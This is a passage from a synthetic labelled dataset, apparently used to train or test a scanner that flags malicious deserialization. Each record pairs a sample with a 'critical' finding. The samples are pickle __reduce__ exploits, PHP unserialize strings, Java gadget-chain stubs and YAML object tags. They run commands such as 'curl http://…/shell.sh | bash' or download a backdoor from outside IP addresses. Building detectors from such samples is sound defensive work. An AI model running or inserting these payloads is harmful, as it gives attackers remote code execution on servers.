file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections2\n// Payload: Runtime.exec(\"curl http://51.184.24.11/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections2\n// Payload: Runtime.exec(\"curl http://51.184.24.11/shell\")"}}]} {"id": "synth_malicious_deserialization_00675", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('Y/onxMzsCKqLfVE87XtzbsY4SaeRCzfXjG9NCCB5gQsmhngthlFbYeuWsycy')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://21.144.255.75/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('Y/onxMzsCKqLfVE87XtzbsY4SaeRCzfXjG9NCCB5gQsmhngthlFbYeuWsycy')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00676", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nO:8:\"Exploit\":1:{s:4:\"data\";s:49:\"8r/Y6tgTZKoOLtCRFG7MaWnRuRB3AL0ioFMPituo\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://207.55.177.82/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:49:\"8r/Y6tgTZKoOLtCRFG7MaWnRuRB3AL0ioFMPituo\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://207.55.177.82/bd\")"}}]} {"id": "synth_malicious_deserialization_00677", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('VoH0MJOLiCb/LtSY3/hXDy8DbUj8Db8KlUkStEgG9TbQiLcmtvFTN24ZEdHH')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://23.254.241.114/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('VoH0MJOLiCb/LtSY3/hXDy8DbUj8Db8KlUkStEgG9TbQiLcmtvFTN24ZEdHH')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00678", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nimport pickle, base64\ndata = base64.b64decode('qQL+1qu6qkqKDsRFwSNhnYBxd5WIAmbQE6Gr3btXkm6qgyeXmhDOvCDV1vC9')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://28.211.183.10/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('qQL+1qu6qkqKDsRFwSNhnYBxd5WIAmbQE6Gr3btXkm6qgyeXmhDOvCDV1vC9')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00679", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:29:\"iRlHQHiKf/c2L8DyVPl4o+QUrVxQSukn88t1yzqK\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://72.130.52.132/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:29:\"iRlHQHiKf/c2L8DyVPl4o+QUrVxQSukn88t1yzqK\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://72.130.52.132/bd\")"}}]} {"id": "synth_malicious_deserialization_00680", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections7\n// Payload: Runtime.exec(\"curl http://27.111.187.231/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections7\n// Payload: Runtime.exec(\"curl http://27.111.187.231/shell\")"}}]} {"id": "synth_malicious_deserialization_00681", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('9LbhrKx746cOsavvGDt2VATQzV92A+1CCd1Vd8QmD45nZzy+PO4ymF+2IHI+')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://254.137.9.175/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('9LbhrKx746cOsavvGDt2VATQzV92A+1CCd1Vd8QmD45nZzy+PO4ymF+2IHI+')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00682", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://171.60.8.98/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://144.176.189.41/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://171.60.8.98/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://144.176.189.41/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00683", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:60:\"Z0/ovWdYa+kSo8HuqsXa0d/AMNIGzx0v1yT1NDex\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://199.43.224.10/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:60:\"Z0/ovWdYa+kSo8HuqsXa0d/AMNIGzx0v1yT1NDex\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://199.43.224.10/bd\")"}}]} {"id": "synth_malicious_deserialization_00684", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nimport pickle, base64\ndata = base64.b64decode('gPuZunXSsZ8g3XxUgVUf0LSWMg5Mxs5fLRResVys+oOiskgohWMZrQ8IrHC/')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://44.233.237.137/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('gPuZunXSsZ8g3XxUgVUf0LSWMg5Mxs5fLRResVys+oOiskgohWMZrQ8IrHC/')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00685", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections2\n// Payload: Runtime.exec(\"curl http://169.28.112.140/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections2\n// Payload: Runtime.exec(\"curl http://169.28.112.140/shell\")"}}]} {"id": "synth_malicious_deserialization_00686", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('gWJTnTSikvaeUsMtqEaa99tvHq7FTPx3eTa3rw70jGDyEAJu9koVxxJ8Tlo7')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://79.160.117.205/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('gWJTnTSikvaeUsMtqEaa99tvHq7FTPx3eTa3rw70jGDyEAJu9koVxxJ8Tlo7')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00687", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('LFC+HCqTNj44hgPeMMSrd7vtp5ZJB+9trydbU5QAnXURU/c/KSuIurY8Qmb2')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://57.192.81.126/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('LFC+HCqTNj44hgPeMMSrd7vtp5ZJB+9trydbU5QAnXURU/c/KSuIurY8Qmb2')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00688", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('dFtoebunSLDmkJ1UOtqqqKwPcmeU9akDj2HU0zU+fJ4+Lc93soVF0kOM9Qb9')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://47.131.229.1/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('dFtoebunSLDmkJ1UOtqqqKwPcmeU9akDj2HU0zU+fJ4+Lc93soVF0kOM9Qb9')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00689", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:61:\"0tbBdhl7uWb8Him1ARIhroLc8RdscjcBxJVc66Gw\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://234.207.44.244/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:61:\"0tbBdhl7uWb8Him1ARIhroLc8RdscjcBxJVc66Gw\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://234.207.44.244/bd\")"}}]} {"id": "synth_malicious_deserialization_00690", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('2HJ6SZN87YDqzQCH+yGCGLqc8YrZHy909nIDRJWqyEURkOoQw73DySUxG3Tp')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://178.243.57.57/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('2HJ6SZN87YDqzQCH+yGCGLqc8YrZHy909nIDRJWqyEURkOoQw73DySUxG3Tp')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00691", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:36:\"ZVJzqaVK0EgjmwFg1vC+gGCkf7QTMdvia6uTe1sC\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://167.84.225.71/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:36:\"ZVJzqaVK0EgjmwFg1vC+gGCkf7QTMdvia6uTe1sC\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://167.84.225.71/bd\")"}}]} {"id": "synth_malicious_deserialization_00692", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:63:\"j7ldJDs83Bb6WXra+HTbqiVNER/L/V29T2UYsbFv\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://58.47.92.192/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:63:\"j7ldJDs83Bb6WXra+HTbqiVNER/L/V29T2UYsbFv\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://58.47.92.192/bd\")"}}]} {"id": "synth_malicious_deserialization_00693", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\n!!python/object/apply:os.system\nargs: ['curl http://28.214.245.177/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://129.249.37.179/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://28.214.245.177/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://129.249.37.179/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00694", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:60:\"1nVjC6ICUHmrHJEhxFWjvgDD9pj3Z4utyg0oYEdD\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://153.173.16.199/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:60:\"1nVjC6ICUHmrHJEhxFWjvgDD9pj3Z4utyg0oYEdD\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://153.173.16.199/bd\")"}}]} {"id": "synth_malicious_deserialization_00695", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections7\n// Payload: Runtime.exec(\"curl http://100.17.205.122/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections7\n// Payload: Runtime.exec(\"curl http://100.17.205.122/shell\")"}}]} {"id": "synth_malicious_deserialization_00696", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nimport pickle, base64\ndata = base64.b64decode('lewKGoWQRN16fKTo2FQRFgDTJRIMA1Luk9ltBoEywo9knY8k1KKpFsoIxKU3')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://139.1.32.87/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('lewKGoWQRN16fKTo2FQRFgDTJRIMA1Luk9ltBoEywo9knY8k1KKpFsoIxKU3')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00697", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nO:8:\"Exploit\":1:{s:4:\"data\";s:28:\"oyTKOhFmkOyhvEHxdb70EHwIQFYkselFqIKO77+y\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://252.38.123.252/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:28:\"oyTKOhFmkOyhvEHxdb70EHwIQFYkselFqIKO77+y\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://252.38.123.252/bd\")"}}]} {"id": "synth_malicious_deserialization_00698", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nO:8:\"Exploit\":1:{s:4:\"data\";s:79:\"AweaZOX6xQbM3BjgDu6aDpdscOzlXCS1dC9Ubc6z\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://1.20.123.30/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:79:\"AweaZOX6xQbM3BjgDu6aDpdscOzlXCS1dC9Ubc6z\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://1.20.123.30/bd\")"}}]} {"id": "synth_malicious_deserialization_00699", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\n!!python/object/apply:os.system\nargs: ['curl http://170.114.177.172/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://217.186.244.113/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://170.114.177.172/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://217.186.244.113/backdoor', '-O', '/tmp/bd']"}}]}